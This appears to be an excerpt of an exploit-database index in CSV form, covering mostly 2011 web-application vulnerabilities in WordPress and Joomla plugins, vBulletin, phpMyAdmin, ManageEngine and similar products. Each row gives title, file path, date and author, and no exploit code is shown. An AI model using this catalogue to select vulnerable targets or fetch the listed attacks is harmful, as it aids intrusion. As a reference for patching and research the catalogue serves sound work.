+17314,exploits/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - 'search.php' SQL Injection",2011-05-23,D4rkB1t,webapps,php, +17316,exploits/php/webapps/17316.txt,"PHPortfolio - SQL Injection",2011-05-23,lionaneesh,webapps,php, +17320,exploits/php/webapps/17320.txt,"i-doIT 0.9.9-4 - Local File Inclusion",2011-05-25,"AutoSec Tools",webapps,php, +17321,exploits/php/webapps/17321.txt,"Extcalendar 2.0b2 - 'cal_search.php' SQL Injection",2011-05-25,"High-Tech Bridge SA",webapps,php, +17322,exploits/php/webapps/17322.txt,"eGroupWare 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",webapps,php, +17324,exploits/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)",2011-05-25,Metasploit,webapps,php, +17325,exploits/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 - SQL Injection",2011-05-26,"AutoSec Tools",webapps,php, +17327,exploits/php/webapps/17327.txt,"HB eCommerce - SQL Injection",2011-05-27,takeshix,webapps,php, +17330,exploits/php/webapps/17330.html,"cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script)",2011-05-27,ninjashell,webapps,php, +17335,exploits/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,webapps,php, +17336,exploits/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,webapps,php, +17338,exploits/php/webapps/17338.txt,"Joomla! Component com_jmsfileseller - Local File Inclusion",2011-05-28,Valentin,webapps,php, +17341,exploits/php/webapps/17341.txt,"Joomla! Component com_joomnik - SQL Injection",2011-05-29,SOLVER,webapps,php, +17343,exploits/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",webapps,php, +17344,exploits/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",webapps,php, +17346,exploits/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",webapps,php, +17347,exploits/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,webapps,php, +17349,exploits/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed",2011-05-30,Aodrulez,webapps,hardware, +17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,webapps,php, +17360,exploits/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,webapps,windows, +17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php, +17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp, +17376,exploits/hardware/webapps/17376.txt,"Aastra IP Phone 9480i - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware, +17377,exploits/hardware/webapps/17377.txt,"Polycom IP Phone - Web Interface Data Disclosure",2011-06-09,"Yakir Wizman",webapps,hardware, +17378,exploits/php/webapps/17378.py,"Pacer Edition CMS 2.1 - 'rm' Arbitrary File Deletion",2011-06-10,LiquidWorm,webapps,php, +17379,exploits/php/webapps/17379.txt,"Pacer Edition CMS 2.1 - 'l' Local File Inclusion",2011-06-10,LiquidWorm,webapps,php, +17380,exploits/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",webapps,php, +17382,exploits/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",webapps,windows, +17388,exploits/windows/webapps/17388.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",webapps,windows, +17389,exploits/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,webapps,php, +17390,exploits/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",webapps,php, +17393,exploits/multiple/webapps/17393.txt,"Oracle HTTP Server - Cross-Site Scripting Header Injection",2011-06-13,"Yasser ABOUKIR",webapps,multiple, +17394,exploits/php/webapps/17394.txt,"Joomla! Component Scriptegrator 1.5 - Local File Inclusion",2011-06-13,jdc,webapps,php, +17395,exploits/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,webapps,php, +17402,exploits/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",webapps,php, +17403,exploits/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php, +17404,exploits/multiple/webapps/17404.txt,"IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery",2011-06-15,"Core Security",webapps,multiple, +17406,exploits/php/webapps/17406.txt,"Catalog Builder eCommerce Software - Blind SQL Injection",2011-06-16,takeshix,webapps,php, +17408,exploits/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,webapps,php, +17410,exploits/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,webapps,php, +17411,exploits/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",webapps,php, +17412,exploits/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,webapps,php, +17413,exploits/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,webapps,php, +17414,exploits/php/webapps/17414.txt,"Joomla! Component com_calcbuilder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",webapps,php, +17418,exploits/php/webapps/17418.rb,"IF-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,webapps,php, +17423,exploits/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,webapps,php, +17426,exploits/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",webapps,php, +17428,exploits/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",webapps,php, +17435,exploits/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",webapps,php, +17436,exploits/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",webapps,php, +17437,exploits/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",webapps,jsp, +17442,exploits/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,webapps,jsp, +17443,exploits/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",webapps,cgi, +17444,exploits/php/webapps/17444.txt,"Webcat - Multiple Blind SQL Injections",2011-06-23,w0rd,webapps,php, +17445,exploits/php/webapps/17445.txt,"2Point Solutions - 'cmspages.php' SQL Injection",2011-06-23,"Newbie Campuz",webapps,php, +17446,exploits/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,webapps,php, +17452,exploits/php/webapps/17452.txt,"Joomla! Component JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",webapps,php, +17453,exploits/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',webapps,php, +17457,exploits/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,webapps,php, +17464,exploits/php/webapps/17464.txt,"Joomla! Component mDigg 2.2.8 - SQL Injection",2011-07-01,"Caddy Dz",webapps,php, +17465,exploits/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",webapps,php, +17466,exploits/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",webapps,php, +17472,exploits/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17475,exploits/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17477,exploits/php/webapps/17477.txt,"phpDealerLocator - Multiple SQL Injections",2011-07-03,"Robert Cooper",webapps,php, +17478,exploits/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17479,exploits/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17480,exploits/asp/webapps/17480.txt,"DmxReady Faqs Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17481,exploits/asp/webapps/17481.txt,"DmxReady Bilboard 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17482,exploits/asp/webapps/17482.txt,"DmxReady Document Library Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,webapps,asp, +17483,exploits/php/webapps/17483.txt,"DMXReady Account List Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,webapps,php, +17484,exploits/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,webapps,php, +17485,exploits/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,webapps,php, +17487,exploits/php/webapps/17487.php,"WeBid 1.0.2 - 'converter.php' Remote Code Execution",2011-07-04,EgiX,webapps,php, +17493,exploits/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,webapps,asp, +17495,exploits/php/webapps/17495.txt,"BbZL.php - Remote File Inclusion",2011-07-06,"Number 7",webapps,php, +17496,exploits/php/webapps/17496.txt,"Joomla! 1.6.3 - Cross-Site Request Forgery",2011-07-06,"Luis Santana",webapps,php, +17500,exploits/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection",2011-07-07,kaMtiEz,webapps,php, +17503,exploits/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,webapps,jsp, +17508,exploits/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting",2011-07-08,"SecPod Research",webapps,php, +17510,exploits/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,webapps,php, +17514,exploits/php/webapps/17514.php,"phpMyAdmin 3.x - Swekey Remote Code Injection",2011-07-09,Mango,webapps,php, +17515,exploits/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion",2011-07-09,Or4nG.M4N,webapps,php, +17518,exploits/php/webapps/17518.txt,"Tugux CMS 1.2 - 'pid' Arbitrary File Deletion",2011-07-10,LiquidWorm,webapps,php, +17522,exploits/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",webapps,php, +17523,exploits/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",webapps,php, +17524,exploits/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",webapps,php, +17525,exploits/php/webapps/17525.txt,"Joomla! Component com_xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,webapps,php, +17528,exploits/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injections",2011-07-13,"Robert Cooper",webapps,php, +17529,exploits/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,webapps,php, +17530,exploits/php/webapps/17530.txt,"Joomla! Component com_sobi2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,webapps,php, +17531,exploits/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,webapps,php, +17532,exploits/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections",2011-07-14,LiquidWorm,webapps,php, +17533,exploits/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,webapps,php, +17553,exploits/php/webapps/17553.txt,"Joomla! Component com_rsappt_pro2 - Local File Inclusion",2011-07-20,"Don Tukulesto",webapps,php, +17554,exploits/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,webapps,php, +17551,exploits/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",webapps,jsp, +17555,exploits/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - 'messagegroupid' SQL Injection",2011-07-21,fb1h2s,webapps,php, +17556,exploits/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,webapps,php, +17560,exploits/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,webapps,php, +17562,exploits/php/webapps/17562.php,"ExtCalendar2 - Cookie Authentication Bypass / Backdoor Upload",2011-07-23,Lagripe-Dz,webapps,php, +17574,exploits/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,webapps,jsp, +17570,exploits/php/webapps/17570.txt,"MusicBox 3.7 - Multiple Vulnerabilities",2011-07-25,R@1D3N,webapps,php, +17571,exploits/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",webapps,php, +17572,exploits/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",webapps,multiple, +17573,exploits/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,webapps,php, +17577,exploits/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",webapps,cgi, +17579,exploits/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)",2011-07-28,TecR0c,webapps,php, +17584,exploits/php/webapps/17584.php,"cFTP 0.1 - 'r80' Arbitrary File Upload",2011-07-29,leviathan,webapps,php, +17586,exploits/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",webapps,jsp, +17587,exploits/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",webapps,php, +17590,exploits/php/webapps/17590.txt,"Digital Scribe 1.5 - register_form()' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,webapps,php, +17591,exploits/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,webapps,php, +17592,exploits/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,webapps,php, +17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,webapps,php, +17595,exploits/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN & dR.sqL",webapps,php, +17594,exploits/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure (Metasploit)",2011-08-01,Metasploit,webapps,jsp, +17597,exploits/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN & dR.sqL",webapps,php, +17602,exploits/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,webapps,php, +17603,exploits/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",webapps,php, +17606,exploits/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,webapps,multiple, +17613,exploits/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,webapps,php, +17615,exploits/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,webapps,jsp, +17616,exploits/php/webapps/17616.txt,"WordPress Plugin ProPlayer 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",webapps,php, +17617,exploits/php/webapps/17617.txt,"WordPress Plugin Social Slider 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",webapps,php, +17637,exploits/php/webapps/17637.txt,"Simple Machines Forum (SMF) 2.0 - Session Hijacking",2011-08-07,seth,webapps,php, +17627,exploits/php/webapps/17627.txt,"WordPress Plugin UPM Polls 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",webapps,php, +17628,exploits/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",webapps,php, +17629,exploits/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,webapps,php, +17630,exploits/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,webapps,php, +17631,exploits/php/webapps/17631.txt,"ATutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,webapps,php, +17633,exploits/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,webapps,php, +17639,exploits/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,webapps,php, +17640,exploits/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,webapps,php, +17644,exploits/php/webapps/17644.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (2)",2011-08-09,pentesters.ir,webapps,php, +17646,exploits/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,webapps,php, +17653,exploits/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",webapps,cgi, +17666,exploits/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",webapps,php, +17660,exploits/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,webapps,php, +17661,exploits/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",webapps,php, +17662,exploits/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",webapps,php, +17667,exploits/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,webapps,php, +17673,exploits/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",webapps,php, +17674,exploits/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,webapps,php, +17675,exploits/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (1)",2011-08-17,v3n0m,webapps,php, +17677,exploits/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",webapps,php, +17678,exploits/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",webapps,php, +17679,exploits/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",webapps,php, +17680,exploits/php/webapps/17680.txt,"WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",webapps,php, +17681,exploits/php/webapps/17681.txt,"WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",webapps,php, +17682,exploits/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,webapps,php, +17683,exploits/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17684,exploits/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17685,exploits/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",webapps,php, +17686,exploits/php/webapps/17686.txt,"WordPress Plugin Ajax Gallery 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17687,exploits/php/webapps/17687.txt,"WordPress Plugin Global Content Blocks 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17688,exploits/php/webapps/17688.txt,"WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17689,exploits/php/webapps/17689.txt,"WordPress Plugin Menu Creator 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php, +17695,exploits/php/webapps/17695.txt,"PHPMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,webapps,php, +17694,exploits/php/webapps/17694.txt,"network tracker .95 - Persistent Cross-Site Scripting",2011-08-19,G13,webapps,php, +17698,exploits/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection (Metasploit)",2011-08-19,Metasploit,webapps,php, +17702,exploits/php/webapps/17702.rb,"WordPress Plugin Block-Spam-By-Math-Reloaded - Bypass",2011-08-20,"Tiago Ferreira & Heyder Andrade",webapps,php, +17703,exploits/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",webapps,php, +17704,exploits/php/webapps/17704.txt,"WordPress Plugin UnGallery 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",webapps,php, +17705,exploits/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh jakesh",webapps,php, +17706,exploits/php/webapps/17706.pl,"OneFileCMS 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,webapps,php, +17707,exploits/php/webapps/17707.txt,"WordPress Plugin MM Duplicate 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",webapps,php, +17708,exploits/php/webapps/17708.txt,"Web Solutions Wcs2u - SQL Injection",2011-08-22,tempe_mendoan,webapps,php, +17709,exploits/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php, +17710,exploits/php/webapps/17710.txt,"DV Cart Shopping Cart software - SQL Injection",2011-08-22,"Eyup CELIK",webapps,php, +17711,exploits/asp/webapps/17711.txt,"Redlab CMS - Multiple SQL Injections",2011-08-22,tempe_mendoan,webapps,asp, +17713,exploits/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-08-23,LiquidWorm,webapps,jsp, +17714,exploits/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (Add Admin)",2011-08-24,G13,webapps,php, +17716,exploits/php/webapps/17716.txt,"WordPress Plugin SendIt 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,webapps,php, +17720,exploits/php/webapps/17720.txt,"WordPress Plugin Photoracer 1.0 - SQL Injection",2011-08-26,evilsocket,webapps,php, +17722,exploits/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 < 5.2 - Arbitrary Code Execution (Metasploit)",2011-08-26,"Aung Khant",webapps,php, +17724,exploits/php/webapps/17724.txt,"WordPress Plugin Js-appointment 1.5 - SQL Injection",2011-08-27,"Miroslav Stampar",webapps,php, +17725,exploits/php/webapps/17725.txt,"WordPress Plugin MM Forms Community 1.2.3 - SQL Injection",2011-08-27,"Miroslav Stampar",webapps,php, +17728,exploits/php/webapps/17728.txt,"WordPress Plugin Super CAPTCHA 2.2.4 - SQL Injection",2011-08-27,"Miroslav Stampar",webapps,php, +17729,exploits/php/webapps/17729.txt,"WordPress Plugin Collision Testimonials 3.0 - SQL Injection",2011-08-27,"Miroslav Stampar",webapps,php, +17730,exploits/php/webapps/17730.txt,"WordPress Plugin oQey Headers 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",webapps,php, +17731,exploits/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",webapps,php, +17733,exploits/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,webapps,asp, +17734,exploits/php/webapps/17734.txt,"Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,webapps,php, +17736,exploits/php/webapps/17736.txt,"Joomla! Component mod_simpleFileLister 1.0 - Directory Traversal",2011-08-28,evilsocket,webapps,php, +17737,exploits/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",webapps,php, +17738,exploits/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",webapps,php, +17739,exploits/php/webapps/17739.txt,"WordPress Plugin Profiles 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",webapps,php, +17740,exploits/php/webapps/17740.txt,"WordPress Plugin mySTAT 2.6 - SQL Injection",2011-08-28,"Miroslav Stampar",webapps,php, +17741,exploits/php/webapps/17741.txt,"Omnistar Mailer - Multiple Vulnerabilities",2011-08-28,Sid3^effects,webapps,php, +17743,exploits/php/webapps/17743.rb,"LifeSize Room - Command Injection (Metasploit)",2011-08-28,"Spencer McIntyre",webapps,php, +17748,exploits/php/webapps/17748.txt,"WordPress Plugin SH Slideshow 3.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",webapps,php, +17749,exploits/php/webapps/17749.txt,"WordPress Plugin iCopyright(R) Article Tools 1.1.4 - SQL Injection",2011-08-29,"Miroslav Stampar",webapps,php, +17750,exploits/php/webapps/17750.txt,"WordPress Plugin Advertizer 1.0 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17751,exploits/php/webapps/17751.txt,"WordPress Plugin Event Registration 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17752,exploits/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,webapps,php, +17753,exploits/php/webapps/17753.txt,"FileBox File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,webapps,php, +17755,exploits/php/webapps/17755.txt,"WordPress Plugin Crawl Rate Tracker 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17756,exploits/php/webapps/17756.txt,"WordPress Plugin Audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17757,exploits/php/webapps/17757.txt,"WordPress Plugin yolink Search 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17758,exploits/php/webapps/17758.txt,"WordPress Plugin PureHTML 1.0.0 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17759,exploits/php/webapps/17759.txt,"WordPress Plugin Couponer 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",webapps,php, +17760,exploits/php/webapps/17760.txt,"WordPress Plugin grapefile 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",webapps,php, +17761,exploits/php/webapps/17761.txt,"WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",webapps,php, +17763,exploits/php/webapps/17763.txt,"WordPress Plugin Donation 1.0 - SQL Injection",2011-09-01,"Miroslav Stampar",webapps,php, +17764,exploits/php/webapps/17764.txt,"WordPress Plugin Bannerize 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",webapps,php, +17766,exploits/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",webapps,windows, +17767,exploits/php/webapps/17767.txt,"WordPress Plugin SearchAutocomplete 1.0.8 - SQL Injection",2011-09-01,"Miroslav Stampar",webapps,php, +17771,exploits/php/webapps/17771.txt,"WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection",2011-09-02,"Miroslav Stampar",webapps,php, +17773,exploits/php/webapps/17773.txt,"WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection",2011-09-03,"Miroslav Stampar",webapps,php, +17774,exploits/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion",2011-09-03,"HaCkErS eV!L",webapps,php, 